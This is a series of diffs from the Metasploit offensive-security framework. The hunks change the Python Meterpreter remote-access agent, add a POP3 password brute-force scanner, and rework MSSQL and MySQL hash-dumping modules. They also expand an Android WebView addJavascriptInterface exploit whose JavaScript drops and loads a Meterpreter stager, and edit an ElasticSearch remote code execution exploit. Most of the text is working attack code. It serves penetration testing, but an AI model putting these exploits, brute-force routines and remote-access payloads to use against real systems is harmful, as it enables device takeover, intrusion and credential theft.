+        self.data_lock.acquire()
+        data = self.peek(l)
+        self.data = self.data[len(data):]
         self.data_lock.release()
         return data
 
@@ -236,12 +257,25 @@ class STDProcessBuffer(threading.Thread):
 class STDProcess(subprocess.Popen):
     def __init__(self, *args, **kwargs):
         subprocess.Popen.__init__(self, *args, **kwargs)
+        self.echo_protection = False
 
     def start(self):
         self.stdout_reader = STDProcessBuffer(self.stdout, lambda: self.poll() == None)
         self.stdout_reader.start()
         self.stderr_reader = STDProcessBuffer(self.stderr, lambda: self.poll() == None)
         self.stderr_reader.start()
+
+    def write(self, channel_data):
+        self.stdin.write(channel_data)
+        self.stdin.flush()
+        if self.echo_protection:
+            end_time = time.time() + 0.5
+            out_data = bytes()
+            while (time.time() < end_time) and (out_data != channel_data):
+                if self.stdout_reader.is_read_ready():
+                    out_data = self.stdout_reader.peek(len(channel_data))
+            if out_data == channel_data:
+                self.stdout_reader.read(len(channel_data))
 export(STDProcess)
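The echo-protection change above peeks at buffered stdout and silently drops output that merely echoes what was just written to the child's stdin. A toy sketch of the peek/consume idea on a plain in-memory buffer (this is an illustration, not the real `STDProcessBuffer`):

```python
# Toy sketch of the peek()/read() split plus echo check added above.
class EchoBuffer(object):
    def __init__(self):
        self.data = bytes()

    def peek(self, n=None):
        return self.data if n is None else self.data[:n]

    def read(self, n=None):
        data = self.peek(n)
        self.data = self.data[len(data):]
        return data

buf = EchoBuffer()
sent = b'whoami\n'
buf.data += sent + b'root\n'       # the child echoed our input before answering
if buf.peek(len(sent)) == sent:    # echo protection: discard the echoed input
    buf.read(len(sent))
print(buf.read())                  # b'root\n'
```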
@@ -251,7 +285,7 @@ class PythonMeterpreter(object):
         self.channels = {}
         self.interact_channels = []
         self.processes = {}
-        for func in filter(lambda x: x.startswith('_core'), dir(self)):
+        for func in list(filter(lambda x: x.startswith('_core'), dir(self))):
             self.extension_functions[func[1:]] = getattr(self, func)
         self.running = True
 
@@ -265,6 +299,7 @@ class PythonMeterpreter(object):
         return func
 
     def add_channel(self, channel):
+        assert(isinstance(channel, (subprocess.Popen, MeterpreterFile, MeterpreterSocket)))
         idx = 0
         while idx in self.channels:
             idx += 1

@@ -286,7 +321,7 @@ class PythonMeterpreter(object):
                     break
                 req_length, req_type = struct.unpack('>II', request)
                 req_length -= 8
-                request = ''
+                request = bytes()
                 while len(request) < req_length:
                     request += self.socket.recv(4096)
                 response = self.create_response(request)

@@ -294,17 +329,17 @@ class PythonMeterpreter(object):
             else:
                 channels_for_removal = []
                 # iterate over the keys because self.channels could be modified if one is closed
-                channel_ids = self.channels.keys()
+                channel_ids = list(self.channels.keys())
                 for channel_id in channel_ids:
                     channel = self.channels[channel_id]
-                    data = ''
+                    data = bytes()
                     if isinstance(channel, STDProcess):
                         if not channel_id in self.interact_channels:
                             continue
-                        if channel.stdout_reader.is_read_ready():
-                            data = channel.stdout_reader.read()
-                        elif channel.stderr_reader.is_read_ready():
+                        if channel.stderr_reader.is_read_ready():
                             data = channel.stderr_reader.read()
+                        elif channel.stdout_reader.is_read_ready():
+                            data = channel.stdout_reader.read()
                         elif channel.poll() != None:
                             self.handle_dead_resource_channel(channel_id)
                     elif isinstance(channel, MeterpreterSocketClient):

@@ -312,7 +347,7 @@ class PythonMeterpreter(object):
                         try:
                             d = channel.recv(1)
                         except socket.error:
-                            d = ''
+                            d = bytes()
                         if len(d) == 0:
                             self.handle_dead_resource_channel(channel_id)
                             break

@@ -357,13 +392,13 @@ class PythonMeterpreter(object):
         data_tlv = packet_get_tlv(request, TLV_TYPE_DATA)
         if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED:
             return ERROR_FAILURE
-        preloadlib_methods = self.extension_functions.keys()
+        preloadlib_methods = list(self.extension_functions.keys())
         symbols_for_extensions = {'meterpreter':self}
         symbols_for_extensions.update(EXPORTED_SYMBOLS)
         i = code.InteractiveInterpreter(symbols_for_extensions)
         i.runcode(compile(data_tlv['value'], '', 'exec'))
-        postloadlib_methods = self.extension_functions.keys()
-        new_methods = filter(lambda x: x not in preloadlib_methods, postloadlib_methods)
+        postloadlib_methods = list(self.extension_functions.keys())
+        new_methods = list(filter(lambda x: x not in preloadlib_methods, postloadlib_methods))
         for method in new_methods:
             response += tlv_pack(TLV_TYPE_METHOD, method)
         return ERROR_SUCCESS, response

@@ -386,10 +421,10 @@ class PythonMeterpreter(object):
         if channel_id not in self.channels:
             return ERROR_FAILURE, response
         channel = self.channels[channel_id]
-        if isinstance(channel, file):
-            channel.close()
-        elif isinstance(channel, subprocess.Popen):
+        if isinstance(channel, subprocess.Popen):
             channel.kill()
+        elif isinstance(channel, MeterpreterFile):
+            channel.close()
         elif isinstance(channel, MeterpreterSocket):
             channel.close()
         else:

@@ -405,7 +440,7 @@ class PythonMeterpreter(object):
             return ERROR_FAILURE, response
         channel = self.channels[channel_id]
         result = False
-        if isinstance(channel, file):
+        if isinstance(channel, MeterpreterFile):
             result = channel.tell() >= os.fstat(channel.fileno()).st_size
         response += tlv_pack(TLV_TYPE_BOOL, result)
         return ERROR_SUCCESS, response

@@ -432,13 +467,13 @@ class PythonMeterpreter(object):
             return ERROR_FAILURE, response
         channel = self.channels[channel_id]
         data = ''
-        if isinstance(channel, file):
-            data = channel.read(length)
-        elif isinstance(channel, STDProcess):
+        if isinstance(channel, STDProcess):
             if channel.poll() != None:
                 self.handle_dead_resource_channel(channel_id)
             if channel.stdout_reader.is_read_ready():
                 data = channel.stdout_reader.read(length)
+        elif isinstance(channel, MeterpreterFile):
+            data = channel.read(length)
         elif isinstance(channel, MeterpreterSocket):
             data = channel.recv(length)
         else:

@@ -454,13 +489,13 @@ class PythonMeterpreter(object):
             return ERROR_FAILURE, response
         channel = self.channels[channel_id]
         l = len(channel_data)
-        if isinstance(channel, file):
-            channel.write(channel_data)
-        elif isinstance(channel, subprocess.Popen):
+        if isinstance(channel, subprocess.Popen):
             if channel.poll() != None:
                 self.handle_dead_resource_channel(channel_id)
                 return ERROR_FAILURE, response
-            channel.stdin.write(channel_data)
+            channel.write(channel_data)
+        elif isinstance(channel, MeterpreterFile):
+            channel.write(channel_data)
         elif isinstance(channel, MeterpreterSocket):
             try:
                 l = channel.send(channel_data)

@@ -485,13 +520,17 @@ class PythonMeterpreter(object):
         if handler_name in self.extension_functions:
             handler = self.extension_functions[handler_name]
             try:
-                #print("[*] running method {0}".format(handler_name))
+                if DEBUGGING:
+                    print('[*] running method ' + handler_name)
                 result, resp = handler(request, resp)
-            except Exception, err:
-                #print("[-] method {0} resulted in an error".format(handler_name))
+            except Exception:
+                if DEBUGGING:
+                    print('[-] method ' + handler_name + ' resulted in an error')
+                    traceback.print_exc(file=sys.stderr)
                 result = ERROR_FAILURE
         else:
-            #print("[-] method {0} was requested but does not exist".format(handler_name))
+            if DEBUGGING:
+                print('[-] method ' + handler_name + ' was requested but does not exist')
             result = ERROR_FAILURE
         resp += tlv_pack(TLV_TYPE_RESULT, result)
         resp = struct.pack('>I', len(resp) + 4) + resp

@@ -499,6 +538,9 @@ class PythonMeterpreter(object):
 
 if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0):
     if hasattr(os, 'setsid'):
-        os.setsid()
+        try:
+            os.setsid()
+        except OSError:
+            pass
     met = PythonMeterpreter(s)
     met.run()
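The `create_response` changes above gate diagnostics behind the new module-level `DEBUGGING` flag and print a traceback when a handler raises. A hedged sketch of that dispatch pattern in isolation (the handler table and request value are made up for illustration):

```python
# Sketch of the DEBUGGING-gated handler dispatch introduced above.
import sys
import traceback

DEBUGGING = True
ERROR_SUCCESS, ERROR_FAILURE = 0, 1

def stdapi_sys_process_getpid(request, response):
    import os
    return ERROR_SUCCESS, response + [os.getpid()]

extension_functions = {'stdapi_sys_process_getpid': stdapi_sys_process_getpid}

def dispatch(handler_name, request):
    response = []
    if handler_name in extension_functions:
        handler = extension_functions[handler_name]
        try:
            if DEBUGGING:
                print('[*] running method ' + handler_name)
            result, response = handler(request, response)
        except Exception:
            if DEBUGGING:
                print('[-] method ' + handler_name + ' resulted in an error')
                traceback.print_exc(file=sys.stderr)
            result = ERROR_FAILURE
    else:
        result = ERROR_FAILURE
    return result, response

print(dispatch('stdapi_sys_process_getpid', None))
```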
@@ -0,0 +1,75 @@
+require 'metasploit/framework/login_scanner/base'
+require 'metasploit/framework/login_scanner/rex_socket'
+require 'metasploit/framework/tcp/client'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+
+      # This is the LoginScanner class for dealing with POP3.
+      # It is responsible for taking a single target, and a list of credentials
+      # and attempting them. It then saves the results.
+      class POP3
+        include Metasploit::Framework::LoginScanner::Base
+        include Metasploit::Framework::LoginScanner::RexSocket
+        include Metasploit::Framework::Tcp::Client
+
+        # This method attempts a single login with a single credential against the target
+        # @param credential [Credential] The credential object to attempt to login with
+        # @return [Metasploit::Framework::LoginScanner::Result] The LoginScanner Result object
+        def attempt_login(credential)
+          result_options = {
+            credential: credential,
+            status: :failed
+          }
+
+          disconnect if self.sock
+
+          begin
+            connect
+            select([sock],nil,nil,0.4)
+            # sleep(0.4)
+
+            # Check to see if we recieved an OK?
+            result_options[:proof] = sock.get_once
+            if result_options[:proof][/^\+OK.*/]
+              # If we received an OK we should send the USER
+              sock.put("USER #{credential.public}\r\n")
+              result_options[:proof] = sock.get_once
+              if result_options[:proof][/^\+OK.*/]
+                # If we got an OK after the username we can send the PASS
+                sock.put("PASS #{credential.private}\r\n")
+                result_options[:proof] = sock.get_once
+                if result_options[:proof][/^\+OK.*/]
+                  # if the pass gives an OK, were good to go
+                  result_options[:status] = :success
+                end
+              end
+            end
+          rescue Rex::ConnectionError, EOFError, Timeout::Error, Errno::EPIPE => e
+            result_options.merge!(
+              proof: e.message,
+              status: :connection_error
+            )
+          end
+
+          disconnect if self.sock
+
+          Result.new(result_options)
+        end
+
+        private
+
+        # (see Base#set_sane_defaults)
+        def set_sane_defaults
+          self.max_send_size ||= 0
+          self.send_delay ||= 0
+          self.port ||= 110
+        end
+
+      end
+    end
+  end
+end
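The new Ruby LoginScanner above drives a plain POP3 USER/PASS exchange and records the banner responses as proof. A protocol-level Python sketch of the same flow, for reference only (host and credentials are placeholders, error handling is minimal, and this is not part of the framework):

```python
# Protocol-level sketch of the POP3 USER/PASS exchange the new scanner performs.
import socket

def pop3_login(host, username, password, port=110, timeout=5):
    sock = socket.create_connection((host, port), timeout=timeout)
    try:
        banner = sock.recv(512)
        if not banner.startswith(b'+OK'):
            return False, banner
        sock.sendall(b'USER ' + username.encode() + b'\r\n')
        if not sock.recv(512).startswith(b'+OK'):
            return False, b'USER rejected'
        sock.sendall(b'PASS ' + password.encode() + b'\r\n')
        proof = sock.recv(512)
        return proof.startswith(b'+OK'), proof
    finally:
        sock.close()

# Example with a placeholder target:
# ok, proof = pop3_login('192.0.2.10', 'admin', 'admin')
```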
@@ -61,7 +61,7 @@ module Metasploit
             status: :connection_error
           )
         end
-      rescue ::EOFError, Rex::AddressInUse, Rex::ConnectionError, Rex::ConnectionTimeout, ::Timeout::Error => e
+      rescue ::EOFError, Errno::ENOTCONN, Rex::AddressInUse, Rex::ConnectionError, Rex::ConnectionTimeout, ::Timeout::Error => e
         result_options.merge!(
           proof: e.message,
           status: :connection_error
@@ -31,5 +31,36 @@ module Msf::Payload::Dalvik
     [str.length].pack("N") + str
   end
 
+  def string_sub(data, placeholder="", input="")
+    data.gsub!(placeholder, input + ' ' * (placeholder.length - input.length))
+  end
+
+  def generate_cert
+    x509_name = OpenSSL::X509::Name.parse(
+      "C=Unknown/ST=Unknown/L=Unknown/O=Unknown/OU=Unknown/CN=Unknown"
+    )
+    key = OpenSSL::PKey::RSA.new(1024)
+    cert = OpenSSL::X509::Certificate.new
+    cert.version = 2
+    cert.serial = 1
+    cert.subject = x509_name
+    cert.issuer = x509_name
+    cert.public_key = key.public_key
+
+    # Some time within the last 3 years
+    cert.not_before = Time.now - rand(3600*24*365*3)
+
+    # From http://developer.android.com/tools/publishing/app-signing.html
+    # """
+    # A validity period of more than 25 years is recommended.
+    #
+    # If you plan to publish your application(s) on Google Play, note
+    # that a validity period ending after 22 October 2033 is a
+    # requirement. You can not upload an application if it is signed
+    # with a key whose validity expires before that date.
+    # """
+    cert.not_after = cert.not_before + 3600*24*365*20 # 20 years
+    return cert, key
+  end
 end
@@ -13,10 +13,10 @@ class Metasploit3 < Msf::Auxiliary
 
   def initialize(info={})
     super(update_info(info,
-      'Name'        => 'EtherPAD Duo Login Brute Force Utility',
+      'Name'        => 'EtherPAD Duo Login Bruteforce Utility',
       'Description' => %{
         This module scans for EtherPAD Duo login portal, and
-        performs a login brute force attack to identify valid credentials.
+        performs a login bruteforce attack to identify valid credentials.
       },
       'Author'      =>
         [

@@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
       return
     end
 
-    print_status("#{peer} - Starting login brute force...")
+    print_status("#{peer} - Starting login bruteforce...")
     each_user_pass do |user, pass|
       do_login(user, pass)
     end
@@ -14,10 +14,10 @@ class Metasploit3 < Msf::Auxiliary
 
   def initialize(info={})
     super(update_info(info,
-      'Name'        => 'PocketPAD Login Brute Force Utility',
+      'Name'        => 'PocketPAD Login Bruteforce Force Utility',
      'Description' => %{
         This module scans for PocketPAD login portal, and
-        performs a login brute force attack to identify valid credentials.
+        performs a login bruteforce attack to identify valid credentials.
       },
       'Author'      =>
         [

@@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
       return
     end
 
-    print_status("#{peer} - Starting login brute force...")
+    print_status("#{peer} - Starting login bruteforce...")
     each_user_pass do |user, pass|
       do_login(user, pass)
     end
@@ -55,10 +55,10 @@ class Metasploit3 < Msf::Auxiliary
 
 case version_year
 when "2000"
-hashtype = "mssql.hashes"
+hashtype = "mssql"
 
-when "2005", "2008"
+when "2005", "2008", "2012", "2014"
-hashtype = "mssql05.hashes"
+hashtype = "mssql05"
 end
 
 this_service = report_service(
@@ -74,15 +74,42 @@ class Metasploit3 < Msf::Auxiliary
 'Columns' => ['Username', 'Hash']
 )
 
-hash_loot=""
+service_data = {
+address: ::Rex::Socket.getaddress(rhost,true),
+port: rport,
+service_name: 'mssql',
+protocol: 'tcp',
+workspace_id: myworkspace_id
+}
 
 mssql_hashes.each do |row|
 next if row[0].nil? or row[1].nil?
 next if row[0].empty? or row[1].empty?
 
+credential_data = {
+module_fullname: self.fullname,
+origin_type: :service,
+private_type: :nonreplayable_hash,
+private_data: row[1],
+username: row[0],
+jtr_format: hashtype
+}
+
+credential_data.merge!(service_data)
+
+credential_core = create_credential(credential_data)
+
+login_data = {
+core: credential_core,
+status: Metasploit::Credential::Login::Status::UNTRIED
+}
+
+login_data.merge!(service_data)
+login = create_credential_login(login_data)
+
 tbl << [row[0], row[1]]
 print_good("#{rhost}:#{rport} - Saving #{hashtype} = #{row[0]}:#{row[1]}")
 end
-filename= "#{datastore['RHOST']}-#{datastore['RPORT']}_sqlhashes.txt"
-store_loot(hashtype, "text/plain", datastore['RHOST'], tbl.to_csv, filename, "MS SQL Hashes", this_service)
 end
 
 #Grabs the user tables depending on what Version of MSSQL
@@ -99,7 +126,7 @@ class Metasploit3 < Msf::Auxiliary
 when "2000"
 results = mssql_query(mssql_2k_password_hashes())[:rows]
 
-when "2005", "2008"
+when "2005", "2008", "2012", "2014"
 results = mssql_query(mssql_2k5_password_hashes())[:rows]
 end
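The hunks above and several below replace report_auth_info and loot-file storage with the Metasploit::Credential API. A condensed sketch of that recurring pattern follows; the method names are taken from the hunks themselves, but the report_cred wrapper and its arguments are illustrative only and assume a module that mixes in the framework's credential-reporting concern (which provides create_credential, create_credential_login and myworkspace_id).

  def report_cred(ip:, port:, service:, user:, hash:, jtr:)
    service_data = {
      address: ip,
      port: port,
      service_name: service,
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: user,
      private_data: hash,
      private_type: :nonreplayable_hash,
      jtr_format: jtr
    }.merge(service_data)

    login_data = {
      core: create_credential(credential_data),
      status: Metasploit::Credential::Login::Status::UNTRIED
    }.merge(service_data)

    create_credential_login(login_data)
  end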
@@ -37,41 +37,41 @@ class Metasploit3 < Msf::Auxiliary
 return
 end
 
-this_service = report_service(
+service_data = {
-:host => datastore['RHOST'],
+address: ::Rex::Socket.getaddress(rhost,true),
-:port => datastore['RPORT'],
+port: rport,
-:name => 'mysql',
+service_name: 'mysql',
-:proto => 'tcp'
+protocol: 'tcp',
-)
+workspace_id: myworkspace_id
+}
 
+credential_data = {
+origin_type: :service,
+jtr_format: 'mysql,mysql-sha1',
+module_fullname: self.fullname,
+private_type: :nonreplayable_hash
+}
 
-#create a table to store data
+credential_data.merge!(service_data)
-tbl = Rex::Ui::Text::Table.new(
-'Header' => 'MysQL Server Hashes',
-'Indent' => 1,
-'Columns' => ['Username', 'Hash']
-)
 
 if res.size > 0
 res.each do |row|
-tbl << [row[0], row[1]]
+credential_data[:username] = row[0]
+credential_data[:private_data] = row[1]
 print_good("Saving HashString as Loot: #{row[0]}:#{row[1]}")
+credential_core = create_credential(credential_data)
+login_data = {
+core: credential_core,
+status: Metasploit::Credential::Login::Status::UNTRIED
+}
+login_data.merge!(service_data)
+create_credential_login(login_data)
 end
 end
 
-report_hashes(tbl.to_csv, this_service) unless tbl.rows.empty?
 
 end
 
-#Stores the Hash Table as Loot for Later Cracking
-def report_hashes(hash_loot,service)
-
-filename= "#{datastore['RHOST']}-#{datastore['RPORT']}_mysqlhashes.txt"
-path = store_loot("mysql.hashes", "text/plain", datastore['RHOST'], hash_loot, filename, "MySQL Hashes",service)
-print_status("Hash Table has been saved: #{path}")
-
-end
 
 end
@@ -10,9 +10,22 @@ class Metasploit3 < Msf::Exploit::Remote
 include Msf::Exploit::Remote::BrowserExploitServer
 include Msf::Exploit::Remote::BrowserAutopwn
 
-autopwn_info({
+# Since the NDK stager is used, arch detection must be performed
-:os_flavor => "Android",
+SUPPORTED_ARCHES = [ ARCH_ARMLE, ARCH_MIPSLE, ARCH_X86 ]
-:arch => ARCH_ARMLE,
+
+# Most android devices are ARM
+DEFAULT_ARCH = ARCH_ARMLE
+
+# Some of the default NDK build targets are named differently than
+# msf's builtin constants. This mapping allows the ndkstager file
+# to be looked up from the msf constant.
+NDK_FILES = {
+ARCH_ARMLE => 'armeabi',
+ARCH_MIPSLE => 'mips'
+}
+
+autopwn_info(
+:os_flavor => 'Android',
 :javascript => true,
 :rank => ExcellentRanking,
 :vuln_test => %Q|
@@ -23,12 +36,12 @@ class Metasploit3 < Msf::Exploit::Remote
 } catch(e) {}
 }
 |
-})
+)
 
 def initialize(info = {})
 super(update_info(info,
 'Name' => 'Android Browser and WebView addJavascriptInterface Code Execution',
 'Description' => %q{
 This module exploits a privilege escalation issue in Android < 4.2's WebView component
 that arises when untrusted Javascript code is executed by a WebView that has one or more
 Interfaces added to it. The untrusted Javascript code can call into the Java Reflection
@@ -46,75 +59,185 @@ class Metasploit3 < Msf::Exploit::Remote
 
 Note: Adding a .js to the URL will return plain javascript (no HTML markup).
 },
 'License' => MSF_LICENSE,
 'Author' => [
 'jduck', # original msf module
 'joev' # static server
 ],
 'References' => [
 ['URL', 'http://blog.trustlook.com/2013/09/04/alert-android-webview-addjavascriptinterface-code-execution-vulnerability/'],
 ['URL', 'https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/'],
 ['URL', 'http://50.56.33.56/blog/?p=314'],
 ['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/'],
-['URL', 'https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py']
+['URL', 'https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py'],
+['CVE', '2012-6636'], # original CVE for addJavascriptInterface
+['CVE', '2013-4710'], # native browser addJavascriptInterface (searchBoxJavaBridge_)
+['EDB', '31519'],
+['OSVDB', '97520']
 ],
-'Platform' => 'linux',
+'Platform' => 'android',
-'Arch' => ARCH_ARMLE,
+'Arch' => ARCH_DALVIK,
-'DefaultOptions' => { 'PrependFork' => true },
+'DefaultOptions' => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp' },
 'Targets' => [ [ 'Automatic', {} ] ],
 'DisclosureDate' => 'Dec 21 2012',
 'DefaultTarget' => 0,
 'BrowserRequirements' => {
 :source => 'script',
-:os_flavor => "Android",
+:os_flavor => 'Android'
-:arch => ARCH_ARMLE
 }
 ))
 end
 
+# Hooked to prevent BrowserExploitServer from attempting to do JS detection
+# on requests for the static javascript file
 def on_request_uri(cli, req)
-if req.uri.end_with?('js')
+if req.uri =~ /\.js/
-print_status("Serving javascript")
+serve_static_js(cli, req)
-send_response(cli, js, 'Content-type' => 'text/javascript')
 else
 super
 end
 end
 
+# The browser appears to be vulnerable, serve the exploit
 def on_request_exploit(cli, req, browser)
-print_status("Serving exploit HTML")
+arch = normalize_arch(browser[:arch])
-send_response_html(cli, html)
+print_status "Serving #{arch} exploit..."
+send_response_html(cli, html(arch))
 end
 
-def js
+# The NDK stager is used to launch a hidden APK
-%Q|
+def ndkstager(stagename, arch)
-function exec(obj) {
+localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libs', NDK_FILES[arch] || arch, 'libndkstager.so')
+data = File.read(localfile, :mode => 'rb')
+data.gsub!('PLOAD', stagename)
+end
+
+def js(arch)
+stagename = Rex::Text.rand_text_alpha(5)
+script = %Q|
+function exec(runtime, cmdArr) {
+var ch = 0;
+var output = '';
+var process = runtime.exec(cmdArr);
+var input = process.getInputStream();
+
+while ((ch = input.read()) > 0) { output += String.fromCharCode(ch); }
+return output;
+}
+
+function attemptExploit(obj) {
 // ensure that the object contains a native interface
 try { obj.getClass().forName('java.lang.Runtime'); } catch(e) { return; }
 
+// get the pid
+var pid = obj.getClass()
+.forName('android.os.Process')
+.getMethod('myPid', null)
+.invoke(null, null);
+
 // get the runtime so we can exec
-var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null);
+var runtime = obj.getClass()
-var data = "#{Rex::Text.to_hex(payload.encoded_exe, '\\\\x')}";
+.forName('java.lang.Runtime')
+.getMethod('getRuntime', null)
+.invoke(null, null);
+
+// libraryData contains the bytes for a native shared object built via NDK
+// which will load the "stage", which in this case is our android meterpreter stager.
+// LibraryData is loaded via ajax later, because we have to access javascript in
+// order to detect what arch we are running.
+var libraryData = "#{Rex::Text.to_octal(ndkstager(stagename, arch), '\\\\0')}";
+
+// the stageData is the JVM bytecode that is loaded by the NDK stager. It contains
+// another stager which loads android meterpreter from the msf handler.
+var stageData = "#{Rex::Text.to_octal(payload.raw, '\\\\0')}";
+
 // get the process name, which will give us our data path
-var p = m.invoke(null, null).exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']);
+// $PPID does not seem to work on android 4.0, so we concat pids manually
-var ch, path = '/data/data/';
+var path = '/data/data/' + exec(runtime, ['/system/bin/sh', '-c', 'cat /proc/'+pid.toString()+'/cmdline']);
-while ((ch = p.getInputStream().read()) != 0) { path += String.fromCharCode(ch); }
-path += '/#{Rex::Text.rand_text_alpha(8)}';
 
-// build the binary, chmod it, and execute it
+var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so';
-m.invoke(null, null).exec(['/system/bin/sh', '-c', 'echo "'+data+'" > '+path]).waitFor();
+var stagePath = path + '/#{stagename}.apk';
-m.invoke(null, null).exec(['chmod', '700', path]).waitFor();
 
-m.invoke(null, null).exec([path]);
+// build the library and chmod it
+runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+libraryData+'" > '+libraryPath]).waitFor();
+runtime.exec(['chmod', '700', libraryPath]).waitFor();
+
+// build the stage, chmod it, and load it
+runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+stageData+'" > '+stagePath]).waitFor();
+runtime.exec(['chmod', '700', stagePath]).waitFor();
+
+// load the library (this fails in x86, figure out why)
+runtime.load(libraryPath);
+
+// delete dropped files
+runtime.exec(['rm', stagePath]).waitFor();
+runtime.exec(['rm', libraryPath]).waitFor();
+
 return true;
 }
 
-for (i in top) { if (exec(top[i]) === true) break; }
+for (i in top) { if (attemptExploit(top[i]) === true) break; }
 |
+
+# remove comments and empty lines
+script.gsub(/\/\/.*$/, '').gsub(/^\s*$/, '')
+end
+
+# Called when a client requests a .js route.
+# This is handy for post-XSS.
+def serve_static_js(cli, req)
+arch = req.qstring['arch']
+response_opts = { 'Content-type' => 'text/javascript' }
+
+if arch.present?
+print_status("Serving javascript for arch #{normalize_arch arch}")
+send_response(cli, js(normalize_arch arch), response_opts)
+else
+print_status("Serving arch detection javascript")
+send_response(cli, static_arch_detect_js, response_opts)
+end
+end
+
+# This is served to requests for the static .js file.
+# Because we have to use javascript to detect arch, we have 3 different
+# versions of the static .js file (x86/mips/arm) to choose from. This
+# small snippet of js detects the arch and requests the correct file.
+def static_arch_detect_js
+%Q|
+var arches = {};
+arches['#{ARCH_ARMLE}'] = /arm/i;
+arches['#{ARCH_MIPSLE}'] = /mips/i;
+arches['#{ARCH_X86}'] = /x86/i;
+
+var arch = null;
+for (var name in arches) {
+if (navigator.platform.toString().match(arches[name])) {
+arch = name;
+break;
+}
+}
+
+if (arch) {
+// load the script with the correct arch
+var script = document.createElement('script');
+script.setAttribute('src', '#{get_uri}/#{Rex::Text::rand_text_alpha(5)}.js?arch='+arch);
+script.setAttribute('type', 'text/javascript');
+
+// ensure body is parsed and we won't be in an uninitialized state
+setTimeout(function(){
+var node = document.body \|\| document.head;
+node.appendChild(script);
+}, 100);
+}
+|
 end
 
-def html
+# @return [String] normalized client architecture
-"<!doctype html><html><body><script>#{js}</script></body></html>"
+def normalize_arch(arch)
+if SUPPORTED_ARCHES.include?(arch) then arch else DEFAULT_ARCH end
+end
+
+def html(arch)
+"<!doctype html><html><body><script>#{js(arch)}</script></body></html>"
 end
 end
@@ -15,10 +15,10 @@ class Metasploit3 < Msf::Exploit::Remote
 super(update_info(info,
 'Name' => 'ElasticSearch Dynamic Script Arbitrary Java Execution',
 'Description' => %q{
-This module exploits a remote command execution vulnerability in ElasticSearch,
+This module exploits a remote command execution (RCE) vulnerability in ElasticSearch,
 exploitable by default on ElasticSearch prior to 1.2.0. The bug is found in the
-REST API, which requires no authentication or authorization, where the search
+REST API, which does not require authentication, where the search
-function allows dynamic scripts execution, and can be used for remote attackers
+function allows dynamic scripts execution. It can be used for remote attackers
 to execute arbitrary Java code. This module has been tested successfully on
 ElasticSearch 1.1.1 on Ubuntu Server 12.04 and Windows XP SP3.
 },
@@ -65,29 +65,30 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 
 def exploit
-print_status("#{peer} - Trying to execute arbitrary Java..")
+print_status("#{peer} - Trying to execute arbitrary Java...")
 unless vulnerable?
 fail_with(Failure::Unknown, "#{peer} - Java has not been executed, aborting...")
 end
 
-print_status("#{peer} - Asking remote OS...")
+print_status("#{peer} - Discovering remote OS...")
 res = execute(java_os)
 result = parse_result(res)
 if result.nil?
-fail_with(Failure::Unknown, "#{peer} - Could not get remote OS...")
+fail_with(Failure::Unknown, "#{peer} - Could not identify remote OS...")
 else
-print_good("#{peer} - OS #{result} found")
+# TODO: It'd be nice to report_host() with this info.
+print_good("#{peer} - Remote OS is '#{result}'")
 end
 
 jar_file = ""
 if result =~ /win/i
-print_status("#{peer} - Asking TEMP path")
+print_status("#{peer} - Discovering TEMP path")
 res = execute(java_tmp_dir)
 result = parse_result(res)
 if result.nil?
-fail_with(Failure::Unknown, "#{peer} - Could not get TEMP path...")
+fail_with(Failure::Unknown, "#{peer} - Could not identify TEMP path...")
 else
-print_good("#{peer} - TEMP path found on #{result}")
+print_good("#{peer} - TEMP path identified: '#{result}'")
 end
 jar_file = "#{result}#{rand_text_alpha(3 + rand(4))}.jar"
 else
@@ -107,20 +107,48 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 
 if datastore['DB_REPORT_AUTH'] and datastore['SMBUser'].to_s.strip.length > 0
-report_hash = {
-:host => datastore['RHOST'],
+service_data = {
-:port => datastore['RPORT'],
+address: ::Rex::Socket.getaddress(datastore['RHOST'],true),
-:sname => 'smb',
+port: datastore['RPORT'],
-:user => datastore['SMBUser'].downcase,
+service_name: 'smb',
-:pass => datastore['SMBPass'],
+protocol: 'tcp',
-:active => true
+workspace_id: myworkspace_id
 }
-if datastore['SMBPass'] =~ /[0-9a-fA-F]{32}:[0-9a-fA-F]{32}/
-report_hash.merge!({:type => 'smb_hash'})
+credential_data = {
-else
+origin_type: :service,
-report_hash.merge!({:type => 'password'})
+module_fullname: self.fullname,
+private_data: datastore['SMBPass'],
+username: datastore['SMBUser'].downcase
+}
+
+if datastore['SMBDomain'] and datastore['SMBDomain'] != 'WORKGROUP'
+credential_data.merge!({
+realm_key: Metasploit::Credential::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
+realm_value: datastore['SMBDomain']
+})
 end
-report_auth_info(report_hash)
+
+if datastore['SMBPass'] =~ /[0-9a-fA-F]{32}:[0-9a-fA-F]{32}/
+credential_data.merge!({:private_type => :ntlm_hash})
+else
+credential_data.merge!({:private_type => :password})
+end
+
+credential_data.merge!(service_data)
+
+credential_core = create_credential(credential_data)
+
+login_data = {
+access_level: 'Admin',
+core: credential_core,
+last_attempted_at: DateTime.now,
+status: Metasploit::Credential::Login::Status::SUCCESSFUL
+}
+
+login_data.merge!(service_data)
+login = create_credential_login(login_data)
 end
 
 filename = datastore['SERVICE_FILENAME'] || "#{rand_text_alpha(8)}.exe"
@@ -0,0 +1,58 @@
+##
